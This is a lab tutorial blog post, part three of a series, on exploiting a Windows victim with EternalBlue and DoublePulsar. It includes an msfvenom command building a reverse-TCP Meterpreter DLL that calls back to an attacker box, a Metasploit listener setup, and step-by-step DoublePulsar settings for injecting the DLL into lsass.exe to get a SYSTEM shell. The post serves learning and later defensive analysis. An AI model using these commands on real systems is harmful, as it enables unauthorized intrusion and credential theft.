almost 4 years ago

## From git clone to Pwned - Owning Windows with DoublePulsar and EternalBlue (Part 3)

(NOTE: This is part three in a short series. If you haven't installed an EternalBlue backdoor in your Victim machine, please read Part 2.)

To recap where we are so far: You've installed Python 2.6 and its prerequisites. You can launch Fuzzbunch without errors, and you've backdoored your Victim box. You have a Windows Attack box, a Windows Victim Box, and a Kali box - and all three are on the same network and can communicate with each other. Please revisit the previous posts if this doesn't describe your situation. Otherwise, lets hack things.

Now that we have a backdoor installed, we're going to inject a Meterpreter DLL into a running process on your victim machine, and get a shell as NT Authority\System, the equivalent of root on a Windows box. For this section of the process, I'll assume the following:

1. You are familiar with the Linux command line.
2. You have basic familairity with Metasploit, specifically the msfconsole and msvenom tools. If you arent familiar with these, Offensive Security's Metasploit Unleashed is a great primer available for free.
3. You have backdoored your Victim box successfully.

Let's start by creating a malicious DLL file. The DLL we create is going to run the payload windows/x64/meterpreter/reverse_tcp which creates a 64-bit Meterpreter Reverse TCP connection to an IP address we specify. As noted in Part 2, my Kali system is located at 10.0.2.15.

1. Use the following command to generate the DLL: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9898 -f dll -o meterpreter.dll. This uses the payload mentioned, connecting back to 10.0.2.15, on port 9898. It uses the DLL format and outputs the payload to a file called meterpreter.dll.
2. Copy the DLL over to your Windows Attack box. How you do this is up to you, but a quick and dirty way is to run python -m SimpleHTTPServer on your Kali box, and use a web browser from the Windows Attack box to browse to http://10.0.2.15:8000 and download it directly.
3. Start up msfconsole on Kali and use exploit/multi/handler. We're going to catch our shell here - so use the parameters you set in the DLL by typing set LPORT 9898. You can probably get away without setting the LHOST, but if you want to be sure, type set LHOST 10.0.2.15 as well. Finally, I had some issues with the exploit failing when I didnt set a payload manually. Avoid that by typing set PAYLOAD windows/x64/meterpreter/reverse_tcp. Lastly, type exploit to start your listener. Lots of info in this step, so here's what you should see:

1. If everything looks good, its time to go back to the Windows Attack box. Fire up Fuzzbunch if its not already running, and use doublepulsar.

Injecting the DLL and catching a shell

Like EternalBlue, DoublePulsar will attempt to fill in default module settings for you. We're going to change things, so when you see Prompt for Variable Settings? [Yes]:, hit enter.

1. NetworkTimeout [60]: This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
2. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now - otherwise, hit enter.
3. TargetPort [445]: DoublePulsar targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
4. Protocol: Since we're using SMB here, make sure SMB is selected.
5. Architecture: Make sure you have this set correctly. If you use x86 on an x64 box, you'll get a blue screen of death.
6. Function: DoublePulsar can run shellcode, or run a DLL. Select 2 to Run a DLL.
7. DllPayload []: This is the full path to your Meterpreter DLL; for example, C:\temp\meterpreter.dll
8. DllOrdinal [1]: DLL files call functions by ordinal numbers instead of names. Unfortunately this is out of my scope of knowledge - in my experimentation, I used trial and error until an ordinal number worked. In this case, set your ordinal to 1. If 1 is incorrect, you'll quickly find out via a blue screen of death, nothing happening at all, or the RPC server on the Victim box crashing. Know a great way to determine the ordinal? Please drop me a line.
9. ProcessName [lsass.exe]: The process name you'll inject into. This is your call - pick something run as NT Authority\System, that is also unlikely to crash when disturbed, and is likely to exist and be running on the Victim machine. DoublePulsar uses lsass.exe by default - this works fine, but some Meterpreter actions (such as hashdump) will likely cause it to crash. You can consider spoolsv.exe, SearchIndexer.exe, and lsm.exe as well - experiement a bit with this field.
10. ProcessCommand []: Optional, the process command line to inject into. Leave this blank.
11. Destination IP [10.0.2.7]: Local tunnel IP. For this scenario, leave it as default.
12. Destination Port [445]: Local tunnel port. Again, we'll leave this default.

You should now have a summary of the changes you've made, which should look like this:

If everything looks good, hit enter to launch your exploit. DoublePulsar will connect, check on the EternalBlue backdoor, and inject the DLL. You should see a [+] Doublepulsar Succeeded message. Here's what the attack looks like from your Windows box:

And now the good part - open up your Kali box. If everything has gone well, you've now got a meterpreter session open, and you should have NT Authority\System. w00t!

In the next post, we'll do the same thing with PowerShell Empire. Sick of the Red Team stuff? Coming up are event viewer logs for each of the steps described, PCAPs of each attack, and an analysis of what hits the disk when you launch EternalBlue and DoublePulsar.